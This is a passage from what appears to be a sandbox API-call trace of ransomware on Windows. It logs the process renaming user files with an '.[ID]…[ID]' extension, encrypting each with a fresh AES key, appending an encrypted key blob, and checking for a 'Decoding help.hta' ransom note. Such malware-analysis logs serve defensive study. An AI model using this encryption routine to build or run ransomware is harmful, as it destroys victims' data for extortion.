returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" [0041.169] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" [0041.169] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0041.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.ini.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0041.173] CreateFileMappingA (hFile=0x3b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3cc [0041.173] CryptAcquireContextA (in: phProv=0xd80fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xd80fcec*=0x3449248) returned 1 [0043.827] CryptGenKey (in: hProv=0x3449248, Algid=0x6610, dwFlags=0x1, phKey=0xd80fce8 | out: phKey=0xd80fce8*=0x5d85d0) returned 1 [0043.827] CryptExportKey (in: hKey=0x5d85d0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xd80fbe4, pdwDataLen=0xd80fce4 | out: pbData=0xd80fbe4*, pdwDataLen=0xd80fce4*=0x2c) returned 1 [0043.827] MapViewOfFile (hFileMappingObject=0x3cc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x240) returned 0x4410000 [0043.993] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xd80fbe4*, pdwDataLen=0xd80fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xd80fbe4*, pdwDataLen=0xd80fcf8*=0x100) returned 1 [0046.234] CryptEncrypt (in: hKey=0x5d85d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x4410000*, pdwDataLen=0xd80fce4*=0x240, dwBufLen=0x240 | out: pbData=0x4410000*, pdwDataLen=0xd80fce4*=0x240) returned 1 [0046.234] UnmapViewOfFile (lpBaseAddress=0x4410000) returned 1 [0046.236] CloseHandle (hObject=0x3cc) returned 1 [0046.237] CryptDestroyKey (hKey=0x5d85d0) returned 1 [0046.237] CryptReleaseContext (hProv=0x3449248, dwFlags=0x0) returned 1 [0046.237] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.237] WriteFile (in: hFile=0x3b8, lpBuffer=0xd80fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xd80fcf8, lpOverlapped=0x0 | out: lpBuffer=0xd80fbe4*, lpNumberOfBytesWritten=0xd80fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.255] WriteFile (in: hFile=0x3b8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xd80fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xd80fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.256] CloseHandle (hObject=0x3b8) returned 1 [0046.261] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\desktop.ini.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.266] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0xd80fd30 | out: lpFindFileData=0xd80fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x1e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.lnk", cAlternateFileName="")) returned 1 [0046.266] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*" [0046.266] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*") returned 43 [0046.267] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Decoding help.hta" [0046.267] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\decoding help.hta")) returned 0x1 [0046.267] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Desktop.lnk") returned -1 [0046.267] lstrlenW (lpString="Desktop.lnk") returned 11 [0046.267] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*" [0046.267] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*") returned 43 [0046.267] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpString2="Desktop.lnk" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" [0046.267] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" [0046.267] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.[ID]g9uZrLhJaygpwRm1[ID]" [0046.267] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\desktop.lnk.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0046.268] CreateFileMappingA (hFile=0x3b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3cc [0046.268] CryptAcquireContextA (in: phProv=0xd80fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xd80fcec*=0x3449248) returned 1 [0046.269] CryptGenKey (in: hProv=0x3449248, Algid=0x6610, dwFlags=0x1, phKey=0xd80fce8 | out: phKey=0xd80fce8*=0x5a5b70) returned 1 [0046.269] CryptExportKey (in: hKey=0x5a5b70, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xd80fbe4, pdwDataLen=0xd80fce4 | out: pbData=0xd80fbe4*, pdwDataLen=0xd80fce4*=0x2c) returned 1 [0046.269] MapViewOfFile (hFileMappingObject=0x3cc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1e0) returned 0x32c0000 [0046.271] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xd80fbe4*, pdwDataLen=0xd80fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xd80fbe4*, pdwDataLen=0xd80fcf8*=0x100) returned 1 [0046.272] CryptEncrypt (in: hKey=0x5a5b70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x32c0000*, pdwDataLen=0xd80fce4*=0x1e0, dwBufLen=0x1e0 | out: pbData=0x32c0000*, pdwDataLen=0xd80fce4*=0x1e0) returned 1 [0046.272] UnmapViewOfFile (lpBaseAddress=0x32c0000) returned 1 [0046.273] CloseHandle (hObject=0x3cc) returned 1 [0046.273] CryptDestroyKey (hKey=0x5a5b70) returned 1 [0046.273] CryptReleaseContext (hProv=0x3449248, dwFlags=0x0) returned 1 [0046.273] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.273] WriteFile (in: hFile=0x3b8, lpBuffer=0xd80fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xd80fcf8, lpOverlapped=0x0 | out: lpBuffer=0xd80fbe4*, lpNumberOfBytesWritten=0xd80fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.274] WriteFile (in: hFile=0x3b8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xd80fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xd80fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.274] CloseHandle (hObject=0x3b8) returned 1 [0046.275] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Desktop.lnk.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.275] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0xd80fd30 | out: lpFindFileData=0xd80fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x3a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads.lnk", cAlternateFileName="DOWNLO~1.LNK")) returned 1 [0046.275] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*" [0046.275] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*") returned 43 [0046.275] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Decoding help.hta" [0046.275] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\decoding help.hta")) returned 0x1 [0046.275] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Downloads.lnk") returned -1 [0046.275] lstrlenW (lpString="Downloads.lnk") returned 13 [0046.275] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*" [0046.275] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*") returned 43 [0046.275] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpString2="Downloads.lnk" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" [0046.275] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" [0046.276] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.[ID]g9uZrLhJaygpwRm1[ID]" [0046.276] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.276] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\downloads.lnk.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0046.276] CreateFileMappingA (hFile=0x3b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3cc [0046.276] CryptAcquireContextA (in: phProv=0xd80fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xd80fcec*=0x3449248) returned 1 [0046.277] CryptGenKey (in: hProv=0x3449248, Algid=0x6610, dwFlags=0x1, phKey=0xd80fce8 | out: phKey=0xd80fce8*=0x5a56f0) returned 1 [0046.277] CryptExportKey (in: hKey=0x5a56f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xd80fbe4, pdwDataLen=0xd80fce4 | out: pbData=0xd80fbe4*, pdwDataLen=0xd80fce4*=0x2c) returned 1 [0046.277] MapViewOfFile (hFileMappingObject=0x3cc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3a0) returned 0x32c0000 [0046.311] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xd80fbe4*, pdwDataLen=0xd80fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xd80fbe4*, pdwDataLen=0xd80fcf8*=0x100) returned 1 [0046.312] CryptEncrypt (in: hKey=0x5a56f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x32c0000*, pdwDataLen=0xd80fce4*=0x3a0, dwBufLen=0x3a0 | out: pbData=0x32c0000*, pdwDataLen=0xd80fce4*=0x3a0) returned 1 [0046.312] UnmapViewOfFile (lpBaseAddress=0x32c0000) returned 1 [0046.313] CloseHandle (hObject=0x3cc) returned 1 [0046.313] CryptDestroyKey (hKey=0x5a56f0) returned 1 [0046.313] CryptReleaseContext (hProv=0x3449248, dwFlags=0x0) returned 1 [0046.313] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.313] WriteFile (in: hFile=0x3b8, lpBuffer=0xd80fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xd80fcf8, lpOverlapped=0x0 | out: lpBuffer=0xd80fbe4*, lpNumberOfBytesWritten=0xd80fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.314] WriteFile (in: hFile=0x3b8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xd80fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xd80fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.314] CloseHandle (hObject=0x3b8) returned 1 [0046.315] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Downloads.lnk.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.315] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0xd80fd30 | out: lpFindFileData=0xd80fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 1 [0046.315] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*" [0046.315] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*") returned 43 [0046.315] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Decoding help.hta" [0046.315] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\decoding help.hta")) returned 0x1 [0046.315] lstrcmpiW (lpString1="Decoding help.hta", lpString2="RecentPlaces.lnk") returned -1 [0046.315] lstrlenW (lpString="RecentPlaces.lnk") returned 16 [0046.315] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*" [0046.315] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\*.*") returned 43 [0046.315] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\", lpString2="RecentPlaces.lnk" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" [0046.315] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" [0046.315] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.[ID]g9uZrLhJaygpwRm1[ID]" [0046.315] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.316] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\links\\recentplaces.lnk.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0046.316] CreateFileMappingA (hFile=0x3b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x3cc [0046.316] CryptAcquireContextA (in: phProv=0xd80fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xd80fcec*=0x3449248) returned 1 [0046.317] CryptGenKey (in: hProv=0x3449248, Algid=0x6610, dwFlags=0x1, phKey=0xd80fce8 | out: phKey=0xd80fce8*=0x5a5b70) returned 1 [0046.317] CryptExportKey (in: hKey=0x5a5b70, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xd80fbe4, pdwDataLen=0xd80fce4 | out: pbData=0xd80fbe4*, pdwDataLen=0xd80fce4*=0x2c) returned 1 [0046.317] MapViewOfFile (hFileMappingObject=0x3cc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x160) returned 0x32c0000 [0046.319] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xd80fbe4*, pdwDataLen=0xd80fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xd80fbe4*, pdwDataLen=0xd80fcf8*=0x100) returned 1 [0046.319] CryptEncrypt (in: hKey=0x5a5b70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x32c0000*, pdwDataLen=0xd80fce4*=0x160, dwBufLen=0x160 | out: pbData=0x32c0000*, pdwDataLen=0xd80fce4*=0x160) returned 1 [0046.319] UnmapViewOfFile (lpBaseAddress=0x32c0000) returned 1 [0046.321] CloseHandle (hObject=0x3cc) returned 1 [0046.321] CryptDestroyKey (hKey=0x5a5b70) returned 1 [0046.321] CryptReleaseContext (hProv=0x3449248, dwFlags=0x0) returned 1 [0046.321] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.321] WriteFile (in: hFile=0x3b8, lpBuffer=0xd80fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xd80fcf8, lpOverlapped=0x0 | out: lpBuffer=0xd80fbe4*, lpNumberOfBytesWritten=0xd80fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.322] WriteFile (in: hFile=0x3b8, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xd80fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xd80fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.322] CloseHandle (hObject=0x3b8) returned 1 [0046.322] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Links\\RecentPlaces.lnk.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.325] FindNextFileW (in: hFindFile=0x5a5a70, lpFindFileData=0xd80fd30 | out: lpFindFileData=0xd80fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d2c5b20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x16b, dwReserved0=0x0, dwReserved1=0x0, cFileName="RecentPlaces.lnk", cAlternateFileName="RECENT~1.LNK")) returned 0 [0046.325] FindClose (in: hFindFile=0x5a5a70 | out: hFindFile=0x5a5a70) returned 1 Thread: id = 172 os_tid = 0x688 [0040.304] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Favorites\\*.*", lpFindFileData=0x624fd30 | out: lpFindFileData=0x624fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 173 os_tid = 0x7fc [0040.305] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\*.*", lpFindFileData=0xd94fd30 | out: lpFindFileData=0xd94fd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x27f, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0xffff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff Thread: id = 174 os_tid = 0x518 [0040.306] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\*.*", lpFindFileData=0xda8fd30 | out: lpFindFileData=0xda8fd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, 